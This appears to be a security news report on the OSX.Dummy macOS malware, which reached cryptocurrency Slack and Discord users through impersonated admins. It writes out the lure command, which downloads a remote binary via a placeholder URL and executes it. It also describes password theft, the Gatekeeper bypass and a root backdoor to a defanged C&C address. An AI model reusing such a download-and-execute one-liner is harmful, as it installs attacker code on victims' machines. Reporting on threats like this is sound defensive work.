The malware targeted users in crypto related chat groups Slack or Discord by impersonating admins or key people. Attackers shared small snippets which result in downloading the malware said Remco Verhoef, who spotted the malware first.
Hackers trick’s users to get infect themselves by running the following script, that results in downloading the malware.
$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
If victims execute the curl command it downloads the large mach064 binary (34M) to /tmp/script which has a perfect score on virustotal 0/64 and the file executed.
MACOS Malware not signed
The MACOS malware was later analyzed by malware researcher Patrick Wardle, according to his analysis report the MACOS Malware was not signed and it contains various libraries such as OpenSSL and V8 appear to be statically compiled in.
The malware bypass Gatekeeper that restricts running unsigned binaries, it was first introduced in Mac OS X Leopard, it enforces codesigning and verifies the application before running.
But if the user downloads and run the binaries through the terminal, GateKeeper does not come into play, so an unsigned binary will be executed.
🍎 New mac malware
🔒 Targeting the crypto community
😞 0% VT detections
….why is it named OSX.Dummy? 👾☠️
📝 Read to find out: https://t.co/CEV9i8LkmT
— patrick wardle (@patrickwardle) June 29, 2018
Wardle said the malware set’s itself to run as root and requires users to enter a password for changing file permission. Then the password will be saved to /tmp/dumpdummy and then malware sets the script to be executable.
If the attack successful then malware establishes the connection to attackers C&C server (185[.]243[.]115[.]230) through port 1337 and the attacker can execute arbitrary commands as root user on the infected machine.